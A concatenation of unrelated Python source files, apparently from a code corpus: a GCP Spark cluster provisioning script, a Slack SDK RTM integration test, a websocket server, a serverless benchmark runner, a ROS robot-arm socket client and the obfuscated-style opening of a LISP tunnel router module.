GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure slave node.", str(err))
sys.exit(1)
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
print('Generating infrastructure names and tags')
data_engine = dict()
data_engine['service_base_name'] = (os.environ['conf_service_base_name']).lower().replace('_', '-')
data_engine['edge_user_name'] = (os.environ['edge_user_name']).lower().replace('_', '-')
data_engine['project_name'] = (os.environ['project_name']).lower().replace('_', '-')
data_engine['endpoint_tag'] = os.environ['endpoint_name'].lower().replace('_', '-')
data_engine['region'] = os.environ['gcp_region']
data_engine['zone'] = os.environ['gcp_zone']
try:
if os.environ['gcp_vpc_name'] == '':
raise KeyError
else:
data_engine['vpc_name'] = os.environ['gcp_vpc_name']
except KeyError:
data_engine['vpc_name'] = '{}-ssn-vpc'.format(data_engine['service_base_name'])
try:
data_engine['exploratory_name'] = (os.environ['exploratory_name']).lower().replace('_', '-')
except:
data_engine['exploratory_name'] = ''
try:
data_engine['computational_name'] = os.environ['computational_name'].lower().replace('_', '-')
except:
data_engine['computational_name'] = ''
data_engine['subnet_name'] = '{0}-{1}-subnet'.format(data_engine['service_base_name'],
data_engine['project_name'])
data_engine['master_size'] = os.environ['gcp_dataengine_master_size']
data_engine['slave_size'] = os.environ['gcp_dataengine_slave_size']
data_engine['key_name'] = os.environ['conf_key_name']
data_engine['ssh_key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], data_engine['key_name'])
data_engine['dataengine_service_account_name'] = '{}-{}-ps'.format(data_engine['service_base_name'],
data_engine['project_name'])
if os.environ['conf_os_family'] == 'debian':
initial_user = 'ubuntu'
sudo_group = 'sudo'
if os.environ['conf_os_family'] == 'redhat':
initial_user = 'ec2-user'
sudo_group = 'wheel'
data_engine['cluster_name'] = data_engine['service_base_name'] + '-' + data_engine['project_name'] + \
'-de-' + data_engine['exploratory_name'] + '-' + \
data_engine['computational_name']
data_engine['master_node_name'] = data_engine['cluster_name'] + '-m'
data_engine['slave_node_name'] = data_engine['cluster_name'] + '-s'
data_engine['instance_count'] = int(os.environ['dataengine_instance_count'])
data_engine['notebook_name'] = os.environ['notebook_instance_name']
data_engine['gpu_accelerator_type'] = 'None'
if os.environ['application'] in ('tensor', 'deeplearning'):
data_engine['gpu_accelerator_type'] = os.environ['gcp_gpu_accelerator_type']
data_engine['network_tag'] = '{0}-{1}-ps'.format(data_engine['service_base_name'],
data_engine['project_name'])
master_node_hostname = GCPMeta().get_private_ip_address(data_engine['master_node_name'])
edge_instance_name = '{0}-{1}-{2}-edge'.format(data_engine['service_base_name'],
data_engine['project_name'], data_engine['endpoint_tag'])
edge_instance_hostname = GCPMeta().get_instance_public_ip_by_name(edge_instance_name)
edge_instance_private_ip = GCPMeta().get_private_ip_address(edge_instance_name)
data_engine['dlab_ssh_user'] = os.environ['conf_os_user']
keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
print("Failed to generate variables dictionary.")
append_result("Failed to generate variables dictionary.", str(err))
sys.exit(1)
try:
logging.info('[CREATING DLAB SSH USER ON MASTER NODE]')
print('[CREATING DLAB SSH USER ON MASTER NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\
(master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on master.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON MASTER NODE]')
logging.info('[INSTALLING USERs KEY ON MASTER NODE]')
additional_config = {"user_keyname": os.environ['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON MASTER NODE]')
        print('[CONFIGURE PROXY ON MASTER NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(master_node_hostname, data_engine['master_node_name'], keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on master.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON MASTER NODE]')
print('[INSTALLING PREREQUISITES ON MASTER NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}".\
format(master_node_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE MASTER NODE]')
print('[CONFIGURE MASTER NODE]')
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}".\
format(master_node_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'master')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to configure master node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
jobs = []
for slave in range(data_engine['instance_count'] - 1):
p = multiprocessing.Process(target=configure_slave, args=(slave, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
notebook_instance_ip = GCPMeta().get_private_ip_address(data_engine['notebook_name'])
additional_info = {
"computational_name": data_engine['computational_name'],
"master_node_hostname": master_node_hostname,
"notebook_instance_ip": notebook_instance_ip,
"instance_count": data_engine['instance_count'],
"master_node_name": data_engine['master_node_name'],
"slave_node_name": data_engine['slave_node_name'],
"tensor": False
}
params = "--edge_hostname {} " \
"--keyfile {} " \
"--os_user {} " \
"--type {} " \
"--exploratory_name {} " \
"--additional_info '{}'"\
.format(edge_instance_hostname,
keyfile_name,
data_engine['dlab_ssh_user'],
'spark',
data_engine['exploratory_name'],
json.dumps(additional_info))
try:
local("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params))
except:
append_result("Failed edge reverse proxy template")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i + 1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
ip_address = GCPMeta().get_private_ip_address(data_engine['master_node_name'])
spark_master_url = "http://" + ip_address + ":8080"
        spark_master_access_url = "http://" + edge_instance_hostname + "/{}/".format(
data_engine['exploratory_name'] + '_' + data_engine['computational_name'])
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(data_engine['service_base_name']))
print("Region: {}".format(data_engine['region']))
print("Cluster name: {}".format(data_engine['cluster_name']))
print("Master node shape: {}".format(data_engine['master_size']))
print("Slave node shape: {}".format(data_engine['slave_size']))
print("Instance count: {}".format(str(data_engine['instance_count'])))
with open("/root/result.json", 'w') as result:
res = {"hostname": data_engine['cluster_name'],
"instance_id": data_engine['master_node_name'],
"key_name": data_engine['key_name'],
"Action": "Create new Data Engine",
"computational_url": [
{"description": "Apache Spark Master",
"url": spark_master_acces_url},
# {"description": "Apache Spark Master (via tunnel)",
# "url": spark_master_url}
]
}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
|
test_issue_605.py
|
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import \
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from integration_tests.helpers import is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slack-sdk/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skipif(condition=is_not_specified(), reason="To avoid rate_limited errors")
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread
|
server.py
|
#!/usr/bin/env python3
import asyncio
import random
import websockets
import threading
import time
from queue import Queue
event_loop = None
websocket = None
connection_ready = threading.Semaphore(value=0)
received_data = Queue()
def server_thread_body():
""" The body of the thread where asyncio event loop lives
"""
global event_loop
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
start_server = websockets.serve(receive, '127.0.0.1', 5678)
event_loop.run_until_complete(start_server)
print ('Server started')
event_loop.run_forever()
async def receive(new_websocket, path):
""" Setup a connection and receive data from the client
The coroutine is invoked by the websocket server when the page
is loaded (when the page requests for a websocket). It releases
the `connection_ready` semaphore what starts main synchronous loop
of the script.
After that it is an infinite coroutine run on the websocket server.
It awaits for any messages, and process them when arrive.
"""
    global websocket, connection_ready, received_data
print(f"Server accessed at path: '{path}'")
websocket = new_websocket
connection_ready.release()
while True:
data = await websocket.recv()
        received_data.put(data)
async def send(data):
""" Send `data` to the client
"""
global websocket
print(f"Sent: {data}")
await websocket.send(data)
def send_append(data):
""" Append sending `data` to the client
This function is a wrapper that injects a `Task` into `event_loop`
It is necessary to ensure proper thread synchronization
"""
global event_loop
event_loop.create_task(send(data))
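# Illustrative sketch (editor's addition, not used by this script): a minimal
# Python client that could exercise the server from another process, assuming
# the same `websockets` package. Run it elsewhere with asyncio.run(demo_client()).
async def demo_client(uri='ws://127.0.0.1:5678'):
    async with websockets.connect(uri) as ws:
        while True:
            number = await ws.recv()        # values pushed by send() above
            await ws.send('ack ' + number)  # ends up in received_data below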
server_thread = threading.Thread(target=server_thread_body)
server_thread.daemon = True
server_thread.start()
# We wait here for the server to start and client to connect
connection_ready.acquire()
print('Main synchronous loop start')
while True:
data = "{:0>9}".format(random.randint(0,999999999))
event_loop.call_soon_threadsafe(send_append, data)
time.sleep(2.0)
    while not received_data.empty():
        print("Received: {}".format(received_data.get()))
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "arraySum_chained"
actionName = "arraySum_sequence"
params = "--param n 0"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
        # scan the line for the two 13-digit millisecond timestamps;
        # bounding the loop on both count and i avoids spinning forever
        # on a malformed line
        while count < 2 and i < len(line):
            if line[i].isdigit():
                parsedTimes[count] = line[i:i+13]
                i += 13
                count += 1
                continue
            i += 1
parsedResults.append(parsedTimes)
return parsedResults
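# Example of what parseResult() extracts (editor's sketch; the exact log line
# format comes from single-cold_warm.sh and is an assumption here):
#   "invokeTime: 1619170000000 endTime: 1619170000123"
#   -> [['1619170000000', '1619170000123']]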
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
HiwinRA605_socket_ros_20190521164955.py
|
#!/usr/bin/env python3
# license removed for brevity
#Receive commands from the strategy side and transmit them via socket to the control-side computer
import socket
##Multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #Initial value of the transmitted data
Arm_feedback = 1 #Assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #Initial value of the response counter
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration inside a generator becomes a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## block and keep processing service callbacks
##------------server end-------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.0.1', 8080))#iclab 5
s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('Press 1 to start transmission, 3 to exit: '))
#start_input = 1
if start_input==1:
while 1:
##--------------- send arm commands over the socket -----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8')) # send over the socket (encode str to bytes for Python 3)
feedback_str = s.recv(1024)
# the arm side reports its state in the reply
###test 0403
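# feedback_str[2] is the integer value of the third byte of the reply:
# 70 = 'F' (arm not busy), 84 = 'T' (arm busy), 54 = '6' (shutdown request)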
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
# feedback = 0
# socket_client_arm_state(feedback)
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
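# run the socket client in a background thread; the ROS service server blocks in the main thread below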
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsulating Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import time
import select
import threading
import os
import copy
from subprocess import getoutput
import binascii
try :
import pcappy
except :
pass
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import pcapy
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = [ None , None , None ]
OOO0o0o = None
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = None
Ooo = lisp . lisp_get_ephemeral_port ( )
o0oOoO00o = None
i1 = None
oOOoo00O0O = None
if 15 - 15: I1IiiI
O0ooo00OOo00 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
